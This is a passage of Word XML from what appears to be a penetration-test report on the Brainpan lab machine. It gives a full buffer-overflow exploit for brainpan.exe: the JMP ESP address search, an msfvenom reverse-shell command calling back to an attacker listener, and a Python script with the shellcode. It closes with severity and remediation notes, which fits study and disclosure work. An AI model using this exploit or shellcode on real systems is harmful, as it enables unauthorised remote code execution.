        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>CALL ESP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instruction to instruct the program to actually execute our payload. Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>msf-nasm_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to find the respective opcodes, we find that we can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>FFE4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>FFD4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># msf-nasm_shell </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>nasm &gt; jmp esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>00000000  FFE4              jmp esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>nasm &gt; call esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>00000000  FFD4              call esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can find memory addresses with these instructions in our debugger, using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mona.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plugin. First, we run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>!mona modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to identify an unprotected module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9B9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAC2" wp14:editId="70FCEAC3">
            <wp:extent cx="5943600" cy="818504"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture" descr="2917175e6f9be3d4ce5f8045ad575d14.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="818504"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>2917175e6f9be3d4ce5f8045ad575d14.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>We find that we can use the binary itself (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>brainpan.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), since it doesn’t have any protections. Using this information, we run the following query to locate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>jmp esp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instructions in memory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>!mona find -s '\xff\xe4' -m brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We find one address: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>0x311712f3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This doesn’t contain any bad characters, so should be usable. We update our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> overwrite in our script to the Little Endian notation of that address, which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>"\xf3\x12\x17\x31"</w:t>
      </w:r>
      <w:r>
        <w:t>. We are now ready to try our exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Running the exploit on our test machine, we get a shell back!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9BF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAC4" wp14:editId="70FCEAC5">
            <wp:extent cx="5943600" cy="3311314"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture" descr="20ae0f542aec4372a4ddf58375ea0835.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/78f9b63a3ff44b8dbddeb34bb174f469.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3311314"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>20ae0f542aec4372a4ddf58375ea0835.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Perfect. Now we only have to re-generate our payload and replace our target IP address to weaponize the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.0.100.108 LPORT=443 EXITFUNC=thread -f py -b "\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The final exploit code is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"10.0.0.138"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>9999</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t># badchars: \x00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">buf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  b</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\xbf\xb0\x6b\xdc\x19\xdb\xd7\xd9\x74\x24\xf4\x5d\x29</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\xc9\xb1\x52\x83\xc5\x04\x31\x7d\x0e\x03\xcd\x65\x3e</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\xec\xd1\x92\x3c\x0f\x29\x63\x21\x99\xcc\x52\x61\xfd</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\x85\xc5\x51\x75\xcb\xe9\x1a\xdb\xff\x7a\x6e\xf4\xf0</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\xcb\xc5\x22\x3f\xcb\x76\x16\x5e\x4f\x85\x4b\x80\x6e</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\x46\x9e\xc1\xb7\xbb\x53\x93\x60\xb7\xc6\x03\x04\x8d</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\xda\xa8\x56\x03\x5b\x4d\x2e\x22\x4a\xc0\x24\x7d\x4c</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\xe3\xe9\xf5\xc5\xfb\xee\x30\x9f\x70\xc4\xcf\x1e\x50</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\x14\x2f\x8c\x9d\x98\xc2\xcc\xda\x1f\x3d\xbb\x12\x5c</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\xc0\xbc\xe1\x1e\x1e\x48\xf1\xb9\xd5\xea\xdd\x38\x39</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\x6c\x96\x37\xf6\xfa\xf0\x5b\x09\x2e\x8b\x60\x82\xd1</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\x5b\xe1\xd0\xf5\x7f\xa9\x83\x94\x26\x17\x65\xa8\x38</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\xf8\xda\x0c\x33\x15\x0e\x3d\x1e\x72\xe3\x0c\xa0\x82</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\x6b\x06\xd3\xb0\x34\xbc\x7b\xf9\xbd\x1a\x7c\xfe\x97</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\xdb\x12\x01\x18\x1c\x3b\xc6\x4c\x4c\x53\xef\xec\x07</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\xa3\x10\x39\x87\xf3\xbe\x92\x68\xa3\x7e\x43\x01\xa9</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\x70\xbc\x31\xd2\x5a\xd5\xd8\x29\x0d\xd0\x1c\x55\xa1</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\x8c\x1e\x95\x38\xf6\x96\x73\x50\x18\xff\x2c\xcd\x81</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\x5a\xa6\x6c\x4d\x71\xc3\xaf\xc5\x76\x34\x61\x2e\xf2</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\x26\x16\xde\x49\x14\xb1\xe1\x67\x30\x5d\x73\xec\xc0</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\x28\x68\xbb\x97\x7d\x5e\xb2\x7d\x90\xf9\x6c\x63\x69</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\x9f\x57\x27\xb6\x5c\x59\xa6\x3b\xd8\x7d\xb8\x85\xe1</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\x39\xec\x59\xb4\x97\x5a\x1c\x6e\x56\x34\xf6\xdd\x30</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\xd0\x8f\x2d\x83\xa6\x8f\x7b\x75\x46\x21\xd2\xc0\x79</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\x8e\xb2\xc4\x02\xf2\x22\x2a\xd9\xb6\x43\xc9\xcb\xc2</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\xeb\x54\x9e\x6e\x76\x67\x75\xac\x8f\xe4\x7f\x4d\x74</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">buf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\xf4\x0a\x48\x30\xb2\xe7\x20\x29\x57\x07\x96\x4a\x72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>524</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\xf3\x12\x17\x31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>sock.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>((target,port))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sock.recv(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>sock.send(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sock.recv(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Running the exploit, we get a shell back as user Puck!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="severity"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="70FCE9C7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - An attacker could identify and exploit this vulnerability to remotely gain code execution on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9C8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="remediation"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="70FCE9C9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Patch the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>brainpan.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary to properly allocate buffer space and sanitize user inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9CA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit network access to the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9CB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="proof"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="70FCE9CC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAC6" wp14:editId="32A32DD6">
            <wp:extent cx="3224959" cy="4352925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture" descr="d66c74dd136d44b2e0b8aa1968f8ee6d.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/3fcfd682f31f487fa15a1e936f6d54e4.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3229495" cy="4359047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9CD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>d66c74dd136d44b2e0b8aa1968f8ee6d.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9CE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
